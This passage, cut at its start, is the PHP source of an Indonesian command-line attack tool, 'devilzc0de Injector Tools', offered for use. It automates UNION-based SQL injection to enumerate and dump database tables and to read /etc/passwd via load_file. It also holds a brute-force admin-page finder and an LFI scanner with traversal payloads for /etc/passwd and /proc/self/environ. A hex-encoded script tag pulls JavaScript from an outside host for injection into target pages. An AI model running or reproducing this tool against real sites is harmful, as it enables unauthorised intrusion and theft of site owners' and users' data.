koneksi($situs)) { $ip=parse_url($situs); echo "[+] IP : ".gethostbyname($ip['host'])."\n"; preg_match("/Content-Type:(.+)/", $info, $type); preg_match("/Server:(.+)/", $info, $server); preg_match("/Cache-Control:(.+)/", $info, $cache); preg_match("/Pragma:(.+)/", $info, $pragma); preg_match("/Connection:(.+)/", $info, $connection); preg_match("/Date:(.+)/", $info, $date); preg_match("/Expires:(.+)/", $info, $expires); echo "[+] $type[0]\n"; echo "[+] $server[0]\n"; echo "[+] $cache[0]\n"; echo "[+] $date[0]\n"; echo "[+] $expires[0]\n"; echo "[+] $pragma[0]\n"; } else { echo "[+] Ga Bisa di injek\n"; die(); } } /* Fungsi SQL injection */ function injeksi($target,$akhir) { echo "[+] Target $target\n"; if($this->koneksi($target)) { echo"[+] Koneksi Ke Target Berhasil !!\n"; echo $this->informasi($target); $this->cariKolom($target,$akhir); } else { echo "[+] Koneksi Ke Target Gagal ..!!\n"; } } /* Fungsi Mencari Kolom Yang Bisa Di injek*/ function cariKolom($target,$akhir) { $batas=100; $stop=0; $urlx=$target; for ($i=0;$i<=$batas;$i++) { $kata.= "concat(0x736572616e67,0x3a,".str_repeat($i,1).",0x3a),"; $sql = str_replace("serang", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($kata,",")."+$akhir", $target); if(preg_match("/serang:(.*?):/i", $this->koneksi($sql), $hasil)) { echo"[+] Jumlah Kolom ditemukan $i \n"; echo"[+] Kolom Yang bisa di injek $hasil[1]\n"; for($a = 0; $a <= $i; $a++) { $kol.="$a,"; if($a == $hasil[1]) { $kol = str_replace($hasil[1], "serang", $kol); } } $akhir_url = str_replace("serang", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($kol,",")."+$akhir", $urlx); $exploit="(0x3c736372697074207372633d22687474703a2f2f746f6f6c2e77656e6b68616972752d6d616d6​5742e636f6d2f646576696c7a633064652e6a73223e3c2f7363726970743e)"; $dump=str_replace("serang",$exploit,$akhir_url); echo "[+] Injection URL $akhir_url\n"; $this->simpan_hasil('devilzc0deLog.txt',"[!] URL Injeksi = ".$akhir_url."\r\n"); print ("[!] selesai, lanjutkan mencari tabel dan kolom ? y/n "); fwrite(STDOUT," : "); $jwb=trim(fgets(STDIN)); if($jwb=="y" || "Y") $this->server_info($akhir_url); else $this->mulai(); } } } /* Fungsi String Ke Hexa Untuk Keperluan Merubah nama tabel */ function HexValue($fitri) { for($i = 0; $i < strlen($fitri); $i++) { $a .= dechex(ord($fitri[$i])); } return $a; } /* Fungsi Mencari Versi server, Nama Database, User Database Server */ function server_info($url) { /* Variable Array Jika Mysql Server Versi 4 */ $versi_4_tabel=array('tbladmins','sort','_wfspro_admin'); $versi_4_kolom=array('user','username','password','passwd'); $serv_info=array('User'=>'user()','Database'=>'database()','Version'=>'version()'); $khairu=$url; $aqsara=$url; $fitri=$url; $wenkhairu="--"; foreach ($serv_info as $ambil => $hasilnya) { if(preg_match("/serang:(.*?):serang/", $this->koneksi("".str_replace("serang", "".$string."+concat(0x736572616e67,0x3a,$hasilnya,0x3a,0x736572616e67)+", $url).""), $dapet)) { echo "[+] $ambil : $dapet[1]\n"; $this->simpan_hasil('devilzc0deLog.txt',"$ambil : $dapet[1]\n"); } } $load = str_replace("serang", "".$string."load_file(0x2f6574632f706173737764)", $khairu); if(preg_match("/root:x:/", $this->koneksi($load))) { echo "[+] Load File Berhasil\n"; echo "[+] URL : $load
"; } else { echo"[+] Load File Tidak Berhasil\n"; } if(preg_match("/serang:5.(.*?):serang/", $this->koneksi("".str_replace("serang", "concat(0x736572616e67,0x3a,version(),0x3a,0x736572616e67)", $url).""), $dapet)) { $url = str_replace("serang", "concat(char(114,48,120,58),count(table_name),char(58,114,48,120))", $url); $url = str_replace($wenkhairu, "+from+information_schema.tables+where+table_schema=database()+$wenkhairu", $url); if(preg_match("/r0x:(.*?):r0x/", $this->koneksi($url), $totaltbl)) { echo"[+] Jumlah Total Tabel $totaltbl[1]\n"; $this->simpan_hasil('devilzc0deLog.txt',"[!] Jumlah Total Tabel : $totaltbl[1]\n"); for($i = 0; $i <= $totaltbl[1]; $i++) { if(preg_match("/r0x:(.*?):r0x/", $this->koneksi(str_replace(array("serang", "$wenkhairu"), array("concat(char(114,48,120,58),table_name,char(58,114,48,120))", "+from+information_schema.tables+where+table_schema=database()+limit+".$i.",1+$wenkhairu"), $aqsara)),$nama_tabel)) { echo"[+] Tabel : $nama_tabel[1]\n"; $this->simpan_hasil('devilzc0deLog.txt',"[!] Tabel : $nama_tabel[1]\n"); if(preg_match("/r0x:(.*?):r0x/", $this->koneksi(str_replace(array("serang", "$wenkhairu"), array("concat(char(114,48,120,58),count(column_name),char(58,114,48,120))", "+from+information_schema.columns+where+table_name=0x".$this->HexValue($nama_tabel[1])."+$wenkhairu"), $aqsara)), $totalclm)) { echo "[+] Jumlah Total Kolom Pada $nama_tabel[1] : $totalclm[1]\n"; $this->simpan_hasil('devilzc0deLog.txt',"[!] Jumlah Total Kolom Pada $nama_tabel[1] : $totalclm[1]\n"); for($a = 0; $a <= $totalclm[1]; $a++) { if(preg_match("/r0x:(.*?):r0x/", $this->koneksi(str_replace(array("serang", "$wenkhairu"), array("concat(char(114,48,120,58),column_name,char(58,114,48,120))", "+from+information_schema.columns+where+table_name=0x".$this->HexValue($nama_tabel[1])."+limit+".$a.",1+$wenkhairu"), $fitri)), $nama_kolom)) { echo" $nama_kolom[1]\n"; $this->simpan_hasil('devilzc0deLog.txt',"$nama_kolom[1]\n"); } } } } } } echo"\n\r\n"; echo"[+] Cek devilzc0deLog.txt\n\r"; } } function mulai() { $perintah=array('help','injek','dump','quit','admin','lfi'); $crew="crew"; while(1) { fwrite(STDOUT, "\ncrew@devilzc0de $: "); $devilz = trim(fgets(STDIN)); if ($devilz=='injek') { echo"----------------------------------------------------------\n"; echo"Ex : http://target.com/index.php?id=serang\n"; echo"Ex : http://target.com/index.php?id=serang&cat=cat\n"; echo"----------------------------------------------------------\n"; fwrite(STDOUT, "\ncrew@devilzc0de $: URL -> "); $url = trim(fgets(STDIN)); $y="--"; if (empty($url)) { echo"[!] Please Deh masukan dulu URL-nya\n"; } else { $this->injeksi($url,$y); } } else { if(in_array($devilz,$perintah)) { $this->$devilz(); } else { echo"[!] Perintah tidak ditemukan, Ketik help untuk bantuan\n"; } } } } function header() { $w.="+------------------------------------------------------------------+\n"; $w.="| .___ .__.__ _______ .___ |\n"; $w.="| __| _/_______ _|__| | ________ ____ \ _ \ __| _/____ |\n"; $w.="| / __ |/ __ \ \/ / | | \___ // ___\/ /_\ \ / __ |/ __ \ |\n"; $w.="|/ /_/ \ ___/\ /| | |__/ /\ \___\ \_/ \/ /_/ \ ___/ |\n"; $w.="|\____ |\___ >\_/ |__|____/_____ \\___ >\_____ /\____ |\___ > |\n"; $w.="| \/ \/ \/ \/ \/ \/ \/ |\n"; $w.="|------------------------------------------------------------------|\n"; $w.="| wenkhairu@gmail.com |\n"; $w.="| devilzc0de Injector Tools |\n"; $w.="| Yogyakarta Indonesia December 2010 |\n"; $w.="| Special Thanks For Fitriana Damayanti |\n"; $w.="| Thanks for Loving Me :) |\n"; $w.="| Ketik help untuk bantuan |\n"; $w.="+------------------------------------------------------------------+\n"; echo $w; } function help() { $bantuan.="Bantuan Perintah untuk devilzc0de injector\n"; $bantuan.="Pastikan CURL aktif di php.ini\n"; $bantuan.=" help : - Pusat Bantuan\n"; $bantuan.=" injek : - Injeksi Situs yang terkena SQl injection\n"; $bantuan.=" dump : - Dump hasil Ijeksi\n"; $bantuan.=" quit : - Keluar dari program\n"; $bantuan.=" admin : - Cari Halaman admin\n"; $bantuan.=" lfi : - Local file inlcution scanner\n"; echo $bantuan; } function quit() { echo"[+] Terimakasih, semoga bermanfaat\n"; echo"[+] Saran dan kritik di Tunggu ya :)\n"; echo"[+] loading ......."; sleep(3); exit; } function simpan_hasil($fname = '', $fitri = '') { $file = @fopen(dirname(__FILE__).'/'.$fname.'', 'a'); $tulis = @fwrite($file, $fitri, '60000000'); if ($tulis) { return 1; } else { return 0; } } function admin() { fwrite(STDOUT, "\ncrew@devilzc0de $: URL -> "); $url = trim(fgets(STDIN)); if(empty($url)) { echo"[!] Please Deh masukan dulu URL-nya\n"; } else { $hal_admin=array("WebMin","Admin","WebAdmin","adminssion/","pma/","phpbb/admin/","phpbb3/admin/admin.php","phpbb3/admin/","adminpage/","pageadmin/","forums/admin.aspx","forums/admin.php","forums/admin.asp","forum/admin.aspx","forum/admin.php","forum/admin.asp","blogs/wp-admin/","blog/wp-admin/","admin.asp","admin.aspx","cpanel/","wp-admin/","phpmyadmin/","admin.php","admin/","administrator/","moderator/","webadmin/","adminarea/","bb-admin/","adminLogin/","admin_area/","panel-administracion/","instadmin/","memberadmin/","administratorlogin/","adm/","admin/account.php","admin/index.php","admin/login.php","admin/admin.php","admin/account.php","joomla/administrator","login.php","admin_area/admin.php","admin_area/login.php","siteadmin/login.php","siteadmin/index.php","siteadmin/login.html","admin/account.html","admin/index.html","admin/login.html","admin/admin.html","admin_area/index.php","bb-admin/index.php","bb-admin/login.php","bb-admin/admin.php","admin/home.php","admin_area/login.html","admin_area/index.html","admin/controlpanel.php","admincp/index.asp","admincp/login.asp","admincp/index.html","admin/account.html","adminpanel.html","webadmin.html","webadmin/index.html","webadmin/admin.html","webadmin/login.html","admin/admin_login.html","admin_login.html","panel-administracion/login.html","admin/cp.php","cp.php","administrator/index.php","administrator/login.php","nsw/admin/login.php","webadmin/login.php","admin/admin_login.php","admin_login.php","administrator/account.php","administrator.php","admin_area/admin.html","pages/admin/admin-login.php","admin/admin-login.php","admin-login.php","bb-admin/index.html","bb-admin/login.html","bb-admin/admin.html","admin/home.html","modelsearch/login.php","moderator.php","moderator/login.php","moderator/admin.php","account.php","pages/admin/admin-login.html","admin/admin-login.html","admin-login.html","controlpanel.php","admincontrol.php","admin/adminLogin.html","adminLogin.html","admin/adminLogin.html","home.html","rcjakar/admin/login.php","adminarea/index.html","adminarea/admin.html","webadmin.php","webadmin/index.php","webadmin/admin.php","admin/controlpanel.html","admin.html","admin/cp.html","cp.html","adminpanel.php","moderator.html","administrator/index.html","administrator/login.html","user.html","administrator/account.html","administrator.html","login.html","modelsearch/login.html","moderator/login.html","adminarea/login.html","panel-administracion/index.html","panel-administracion/admin.html","modelsearch/index.html","modelsearch/admin.html","admincontrol/login.html","adm/index.html","adm.html","moderator/admin.html","user.php","account.html","controlpanel.html","admincontrol.html","panel-administracion/login.php","wp-login.php","adminLogin.php","admin/adminLogin.php","home.php","adminarea/index.php","adminarea/admin.php","adminarea/login.php","panel-administracion/index.php","panel-administracion/admin.php","modelsearch/index.php","modelsearch/admin.php","admincontrol/login.php","adm/admloginuser.php","admloginuser.php","admin2.php","admin2/login.php","admin2/index.php","adm/index.php","adm.php","affiliate.php","adm_auth.php","memberadmin.php","administratorlogin.php","admin1.php", "admin1.html", "admin2.php", "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php", "yonetici.html", "ccms/", "ccms/login.php", "ccms/index.php", "maintenance/", "webmaster/", "adm/", "configuration/", "configure/", "websvn/", "admin/", "admin/account.php", "admin/account.html". "admin/index.php", "admin/index.html", "admin/login.php". "admin/login.html", "admin/home.php", "admin/controlpanel.html", "admin/controlpanel.php", "admin.php", "admin.html", "admin/cp.php", "admin/cp.html", "cp.php", "cp.html", "administrator/", "administrator/index.html", "administrator/index.php", "administrator/login.html", "administrator/login.php", "administrator/account.html", "administrator/account.php", "administrator.php", "administrator.html", "login.php", "login.html", "modelsearch/login.php", "moderator.php", "moderator.html", "moderator/login.php", "moderator/login.html", "moderator/admin.php", "moderator/admin.html", "moderator/", "account.php", "account.html", "controlpanel/", "controlpanel.php", "controlpanel.html", "admincontrol.php", "admincontrol.html", "adminpanel.php", "adminpanel.html", "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp", "admin/account.asp", "admin/index.asp", "admin/login.asp", "admin/home.asp", "admin/controlpanel.asp", "admin.asp", "admin/cp.asp", "cp.asp", "administrator/index.asp", "administrator/login.asp", "administrator/account.asp", "administrator.asp", "login.asp", "modelsearch/login.asp", "moderator.asp", "moderator/login.asp", "moderator/admin.asp", "account.asp", "controlpanel.asp", "admincontrol.asp", "adminpanel.asp", "fileadmin/", "fileadmin.php", "fileadmin.asp", "fileadmin.html", "administration/", "administration.php", "administration.html", "sysadmin.php", "sysadmin.html", "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-admin.asp", "ur-admin.php", "ur-admin.html", "ur-admin/", "Server.php", "Server.html", "Server.asp", "Server/", "wp-admin/", "administr8.php", "administr8.html", "administr8/", "administr8.asp", "webadmin/", "webadmin.php", "webadmin.asp", "webadmin.html", "administratie/", "admins/", "admins.php", "admins.asp", "admins.html", "administrivia/", "Database_Administration/", "WebAdmin/", "useradmin/", "sysadmins/", "admin1/", "system-administration/", "administrators/", "pgadmin/", "directadmin/", "staradmin/", "ServerAdministrator/", "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/", "typo3/", "panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_login/", "rcLogin/", "blogindex/", "formslogin/", "autologin/", "support_login/", "meta_login/", "manuallogin/", "simpleLogin/", "loginflat/", "utility_login/", "showlogin/", "memlogin/", "members/", "login-redirect/", "sub-login/", "wp-login/", "login1/", "dir-login/", "login_db/", "xlogin/", "smblogin/", "customer_login/", "UserLogin/", "login-us/", "acct_login/", "admin_area/", "bigadmin/", "project-admins/", "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/", "openvpnadmin/", "wizmysqladmin/", "vadmind/", "ezsqliteadmin/", "hpwebjetadmin/", "newsadmin/", "adminpro/", "Lotus_Domino_Admin/", "bbadmin/", "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-macadmin/", "banneradmin/", "sshadmin/", "phpldapadmin/", "macadmin/", "administratoraccounts/", "admin4_account/", "admin4_colon/", "radmind-1/", "Super-Admin/", "AdminTools/", "cmsadmin/", "SysAdmin2/", "globes_admin/", "cadmins/", "phpSQLiteAdmin/", "navSiteAdmin/", "server_admin_small/", "logo_sysadmin/", "server/", "database_administration/", "power_user/", "system_administration/", "ss_vms_admin_sm/","admincp/index.asp","panel-administracion/login.html","admin_login.php","admin-login.php","pages/admin/admin-login.html","adminLogin.html","adminarea/admin.html","adminarea/login.html","modelsearch/index.html","panel-administracion/login.php","adminarea/index.php","panel-administracion/admin.php","adm.php","adminarea/","bb-admin/","adminLogin/","panel-administracion/","instadmin/","memberadmin/","administratorlogin/","admin/admin.asp","admin_area/admin.asp","admin_area/login.asp","admin/account.html","admin/login.html","admin/admin.html","admin_area/admin.html","admin_area/login.html","admin_area/index.html","admin_area/index.asp","bb-admin/index.asp","bb-admin/login.asp","bb-admin/admin.asp","bb-admin/index.html","bb-admin/login.html","bb-admin/admin.html","admin/home.html","modelsearch/login.html","admin_login.html","pages/admin/admin-login.asp","admin/admin-login.asp","admin-login.asp","admin/account.html","admin/admin-login.html","webadmin/index.html","webadmin/admin.html","webadmin/login.html","user.asp","user.html","admincp/login.asp","admincp/index.html","admin/adminLogin.html","admin/adminLogin.html","home.html","adminarea/index.html","panel-administracion/index.html","panel-administracion/admin.html","modelsearch/admin.html","admin/admin_login.html","admincontrol/login.html","adm/index.html","adm.html","webadmin/index.asp","webadmin/admin.asp","webadmin/login.asp","admin/admin_login.asp","admin_login.asp","panel-administracion/login.asp","adminLogin.asp","admin/adminLogin.asp","home.asp","adminarea/index.asp","adminarea/admin.asp","adminarea/login.asp","admin-login.html","panel-administracion/index.asp","panel-administracion/admin.asp","modelsearch/index.asp","modelsearch/admin.asp","admincontrol/login.asp","adm/admloginuser.asp","admloginuser.asp","admin2/login.asp","admin2/index.asp","adm/index.asp","adm.asp","affiliate.asp","adm_auth.asp","memberadmin.asp","administratorlogin.asp","siteadmin/login.asp","siteadmin/index.asp","siteadmin/login.html"); foreach($hal_admin as $admn) { if(preg_match("/200 OK/", $this->koneksi($url."/".$admn))) { echo"\n\r\n"; echo "[+] Halaman Admin Ditemukan [ $url/$admn ]"; echo"\n\r\n"; } } } } function dump() { fwrite(STDOUT, "\ncrew@devilzc0de $: URL -> "); $url = trim(fgets(STDIN)); fwrite(STDOUT, "\ncrew@devilzc0de $: TABEL -> "); $tbl = trim(fgets(STDIN)); fwrite(STDOUT, "\ncrew@devilzc0de $: KOLOM -> "); $kol = trim(fgets(STDIN)); $kol=str_replace(",",",0x3a,",$kol); $url=str_replace("serang","concat(char(114,48,120,58),group_concat(".$kol."),char(58,114,48,120))",$url); $url=str_replace("+--","",$url); $akhir="--"; $f="+from+".$tbl."+".$akhir.""; $url=$url."".$f; if(preg_match("/r0x:(.*?):r0x/",$this->koneksi($url),$hasil)) { print "\n".$hasil=str_replace(",","\n",$hasil[1])."\n\n"; $this->simpan_hasil('dump_'.$tbl.'.txt',"$hasil\n"); } } function lfi() { print ("Ex: http://vixtom.com/index.php?p=\n"); fwrite(STDOUT, "\ncrew@devilzc0de $: URL -> "); $url = trim(fgets(STDIN)); $list=array('/etc/passwd', '../etc/passwd', '../../etc/passwd', '../../../etc/passwd', '../../../../etc/passwd', '../../../../../etc/passwd', '../../../../../../etc/passwd', '../../../../../../../etc/passwd', '../../../../../../../../etc/passwd', '../../../../../../../../../etc/passwd', '../../../../../../../../../../../../etc/passwd', '../etc/passwd%00', '../../etc/passwd%00', '../../../etc/passwd%00', '../../../../etc/passwd%00', '../../../../../etc/passwd%00', '../../../../../../etc/passwd%00', '../../../../../../../etc/passwd%00', '../../../../../../../../etc/passwd%00', '../../../../../../../../../../../etc/passwd%00', '..%2Fetc..%2Fpasswd', '..%2F..%2Fetc%2Fpasswd', '..%2F..%2F..%2Fetc%2Fpasswd', '..%2F..%2F..%2F..%2Fetc%2Fpasswd', '..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd', '..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd', '..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd', '..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd', '..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd', '..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd', '..%2Fetc%2Fpasswd%00', '..%2F..%2Fetc%2Fpasswd%00', '..%2F..%2F..%2Fetc%2Fpasswd%00', '..%2F..%2F..%2F..%2Fetc%2Fpasswd%00', '..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00', '..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00', '..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00', '..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00', '..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00'); $self_env=array('/proc/self/environ', '../proc/self/environ', '../../proc/self/environ', '../../../proc/self/environ'. '../../../../proc/self/environ', '../../../../../proc/self/environ', '../../../../../../proc/self/environ', '../../../../../../../proc/self/environ', '../../../../../../../../proc/self/environ', '../../../../../../../../../proc/self/environ', '../../../../../../../../../../../proc/self/environ', '/proc/self/environ', '../proc/self/environ%00', '../../proc/self/environ%00', '../../../proc/self/environ%00'. '../../../../proc/self/environ%00', '../../../../../proc/self/environ%00', '../../../../../../proc/self/environ%00', '../../../../../../../proc/self/environ%00', '../../../../../../../../proc/self/environ%00', '../../../../../../../../../proc/self/environ%00', '../../../../../../../../../../../proc/self/environ%00', '..%2Fproc%2Fself%2Fenviron', '..%2F..%2Fproc%2Fself%2Fenviron', '..%2F..%2F..%2Fproc%2Fself%2Fenviron'. '..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron', '..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron', '..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron', '..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron', '..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron', '..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron', '..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron', '%2Fproc%2Fself%2Fenviron', '..%2Fproc%2Fself%2Fenviron%00', '..%2F..%2Fproc%2Fself%2Fenviron%00', '..%2F..%2F..%2Fproc%2Fself%2Fenviron%00'. '..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00', '..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00', '..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00', '..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00', '..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00', '..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00', '..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00​'); if ($this->koneksi($url)) { echo"[!] Koneksi Berhasil\n"; $this->informasi($url); foreach($list as $lfiLink) { if(preg_match("/root:x:/", $this->koneksi($url."".$lfiLink))) { echo"[!] W00t w00t LFI ditemukan $url$lfiLink \n\n"; print"[+] Apakah mau dilanjutkan untuk memeriksa /proc/self/environ?"; fwrite(STDOUT,": "); $pilihan=trim(fgets(STDIN)); if($pilihan='y' || $piliahn ='Y') { foreach($self_env as $self) { if(preg_match("/DOCUMENT_ROOT=/", $this->koneksi($url."".$self))) { echo"[!] W00t w00t /proc/self/environ ditemukan $url$self \n\n"; $this->mulai(); } else { echo"[!] $url$self -> !NO\n"; } } } else { $this->mulai(); } } else { echo"[!] $url$lfiLink -> tidak ditemukan\n"; } } } } } /* +----------------------------------------------+ Deklarasi Class untuk penggunaan +----------------------------------------------+ */ $wen=new SuntikSql; $wen->header(); $wen->mulai(); ?>